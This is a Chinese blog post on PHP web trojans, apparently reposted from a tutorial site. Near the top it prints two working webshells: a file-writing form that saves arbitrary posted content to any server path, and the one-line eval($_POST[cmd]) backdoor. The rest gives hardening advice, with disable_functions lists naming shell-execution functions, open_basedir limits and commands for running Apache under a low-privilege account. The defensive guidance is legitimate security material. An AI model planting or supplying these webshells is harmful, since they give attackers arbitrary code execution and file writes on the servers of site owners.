全世界最小的php网页木马一枚 附PHP木马的防范方法


Posted in PHP onOctober 09, 2009

php网页木马

<?php 
header("content-Type: text/html; charset=gb2312"); 
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); 
?> 
<form method="POST"> 
保存文件名: <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>"> 
<br><br> 
<textarea name="text" COLS="70" ROWS="18" ></textarea> 
<br><br> 
<input type="submit" name="submit" value="保存"> 
<form> 
<?php 
if(isset($_POST['file'])) 
{ 
$fp = @fopen($_POST['file'],'wb'); 
echo @fwrite($fp,$_POST['text']) ? '保存成功!' : '保存失败!'; 
@fclose($fp); 
} 
?>

一句话php木马
<?php eval($_POST[cmd]);?>

PHP木马的防范方法
PHP是能让你生成动态网页的工具之一。PHP网页文件被当作一般HTML网页文件来处理并且在编辑时你可以用编辑HTML的常规方法编写PHP。
PHP代表,超文本预处理器(PHP: Hypertext Preprocessor),可以从PHP官方站点(http://www.php.net)自由下载。PHP遵守GNU公共许可(GPL),在这一许可下诞生了许多流行的软件诸如Linux和Emacs。PHP在大多数Unix平台,GUN/Linux和微软Windows平台上均可以运行。怎样在Windows环境的PC机器或Unix机器上安装PHP的资料可以在PHP官方站点上找到。安装过程很简单。
PHP的另一好处就在于他的安全性,随着现在互联网的发展,网络安全越来越受重视,PHP的诞生几乎代替了ASP,因为PHP对于安全方面的设置是极为简单的不像ASP那样需要很多的步骤,和禁用很多的服务。不过再好的东西也始终会有不足,如果默认设置的PHP同意也是不堪一击,因此本文就来讲一下如何对PHP进行一些安全方面的配置,来防止脚本木马的破坏。
一、防止php木马执行webshell
打开safe_mode, 在,php.ini中设置 disable_functions= passthru,exec,shell_exec,system 二者选一即可,也可都选。
二、防止跳出web目录
首先修改httpd.conf,如果你只允许你的php脚本程序在web目录里操作,还可以修改httpd.conf文件限制php的操作路径。比如你的web目录是/usr/local/apache/htdocs,那么在httpd.conf里加上这么几行: php_admin_value open_basedir /usr/local/apache/htdocs ,如果脚本要读取/usr/local/apache/htdocs以外的文件将不会被允许,如果错误显示打开的话会提示这样的错误: Warning: open_basedir restriction in effect. File is in wrong directory in /usr/local/apache/htdocs/open.php on line 4 等等。
三、防止php木马读写文件目录
在php.ini中的 disable_functions= passthru,exec,shell_exec,system 后面加上php处理文件的函数,主要有 fopen,mkdir,rmdir,chmod,unlink,dir,fopen,fread,fclose,fwrite,file_exists,closedir,is_dir,readdir.opendir,fileperms.copy,unlink,delfile 。即成为 disable_functions= passthru,exec,shell_exec,system,fopen,mkdir,rmdir,chmod,unlink,dir ,fopen,fread,fclose,fwrite,file_exists ,closedir,is_dir,readdir.opendir ,fileperms.copy,unlink,delfile 。
ok,大功告成,php木马拿我们没辙了,遗憾的是这样的话,利用文本数据库的那些东西就都不能用了。 如果是在windos平台下搭建的apache还需要注意一点,apache默认运行是system权限,必须给apache降降权限,如下:
net user apache f**kmicrosoft /add
net localgroup users apache /del
此时建立了一个不属于任何组的用户apche,只要打开计算机管理器-服务-apache服务的属性-log on-this account,在这里填入上面所建立的账户和密码,重启apache服务即可实现apache运行在低权限下。
总结:实际上还可以通过设置各个文件夹的权限,给每一个目录建立一个单独能读写的用户,来实现安全。当前很多虚拟主机提供商的流行配置方法,不过这种方法用于防止这里就显的有点大材小用了。只要我们管理员有安全意识,相对的禁闭不用的功能就可以保证网络安全的威胁。

下面是mcafee的安全设置,防止一些网页木马生成文件等。
https://3water.com/hack/list461_1.html

PHP 相关文章推荐
PHP与javascript对多项选择的处理
Oct 09 PHP
用在PHP里的JS打印函数
Oct 09 PHP
树型结构列出指定目录里所有文件的PHP类
Oct 09 PHP
一漂亮的PHP图片验证码实例
Mar 21 PHP
PHP实现的连贯操作、链式操作实例
Jul 08 PHP
10个简化PHP开发的工具
Dec 25 PHP
php中解析带中文字符的url函数分享
Jan 20 PHP
PHP快速生成各种信息提示框的方法
Feb 03 PHP
PHP7.1方括号数组符号多值复制及指定键值赋值用法分析
Sep 26 PHP
利用PHP生成静态html页面的原理
Sep 30 PHP
PHP实现的ID混淆算法类与用法示例
Aug 10 PHP
php封装实现钉钉机器人报警接口的示例代码
Aug 08 PHP
PHP 字符串分割和比较
Oct 06 #PHP
PHP parse_url 一个好用的函数
Oct 03 #PHP
php面向对象全攻略 (十七) 自动加载类
Sep 30 #PHP
php面向对象全攻略 (十六) 对象的串行化
Sep 30 #PHP
php面向对象全攻略 (十五) 多态的应用
Sep 30 #PHP
php面向对象全攻略 (十四) php5接口技术
Sep 30 #PHP
php面向对象全攻略 (十二) 抽象方法和抽象类
Sep 30 #PHP
You might like
discuz目录文件资料汇总
2014/12/30 PHP
android上传图片到PHP的过程详解
2015/08/03 PHP
php通过curl添加cookie伪造登陆抓取数据的方法
2016/04/02 PHP
PHP使用递归算法无限遍历数组示例
2017/01/13 PHP
JS分页效果示例
2013/10/11 Javascript
javaScript对文字按照拼音排序实现代码
2013/12/27 Javascript
jquery实现图片随机排列的方法
2015/05/04 Javascript
PhantomJS快速入门教程(服务器端的 JavaScript API 的 WebKit)
2015/08/06 Javascript
Jquery-1.9.1源码分析系列(十一)之DOM操作
2015/11/25 Javascript
Jquery on方法绑定事件后执行多次的解决方法
2016/06/02 Javascript
12306 刷票脚本及稳固刷票脚本(防挂)
2017/01/04 Javascript
利用Javascript裁剪图片并存储的简单实现
2017/03/13 Javascript
JavaScript实现实时更新系统时间的实例代码
2017/04/04 Javascript
react-native DatePicker日期选择组件的实现代码
2017/09/12 Javascript
JavaScript引用类型Function实例详解
2018/08/09 Javascript
Vue触发式全局组件构建的方法
2018/11/28 Javascript
jquery获取file表单选择文件的路径、名字、大小、类型
2019/01/18 jQuery
JS实现的点击按钮图片上下滚动效果示例
2019/01/28 Javascript
Vue 2.0双向绑定原理的实现方法
2019/10/23 Javascript
python:批量统计xml中各类目标的数量案例
2020/03/10 Python
Django {{ MEDIA_URL }}无法显示图片的解决方式
2020/04/07 Python
解决pycharm编辑区显示yaml文件层级结构遇中文乱码问题
2020/04/27 Python
CSS3 实现弹跳的小球动画
2020/10/26 HTML / CSS
专注澳大利亚特产和新西兰特产的澳洲中文网:0061澳洲制造
2019/03/24 全球购物
毕业生个人求职信范文分享
2014/01/05 职场文书
完美主义个人的自我评价
2014/02/17 职场文书
大课间体育活动方案
2014/03/12 职场文书
2014校长四风问题对照检查材料思想汇报
2014/09/16 职场文书
不遵守课堂纪律的检讨书
2014/09/24 职场文书
群众路线教育实践活动实施方案
2014/10/31 职场文书
情人节活动总结范文
2015/02/05 职场文书
2015年客服工作总结范文
2015/04/02 职场文书
大学生暑期社会实践的个人总结!
2019/07/17 职场文书
Java 数组内置函数toArray详解
2021/06/28 Java/Android
利用Python多线程实现图片下载器
2022/03/25 Python
ubuntu如何搭建vsftpd服务器
2022/12/24 Servers